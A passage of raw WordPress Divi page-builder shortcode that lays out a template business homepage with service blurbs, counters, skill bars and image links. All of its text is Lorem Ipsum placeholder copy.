gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Photography\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"3.0.87\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text.\r[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"3.22\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#fcd21d\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=1ALjCZkKuUM\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"3.0.83\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"3.22\" background_color=\"#fcd21d\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Generating New Ideas. Solving Big Problems</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"200\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"54\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"12\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"3.0.83\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Why we are different</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p>Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make point of using a type specimen book.</p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-02.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-03.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-05.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-04.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" animation_style=\"flip\" animation_intensity_flip=\"30%\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever since the 1500s, when an unknown printer took a galley of type and scrambled it to make a type specimen book. It is a long established fact that a reader. It was popularised in the 1960s with the release.\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#fcd21d\" use_percentages=\"off\" _builder_version=\"3.0.87\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]UX Research - 77%\r[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#fcd21d\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Interface Design - 85%\r[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"fade\" animation_direction=\"bottom\"][/et_pb_blurb][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Branding\" use_icon=\"on\" font_icon=\"%%369%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.82\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"20%\"][/et_pb_blurb][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-06.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"6%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" 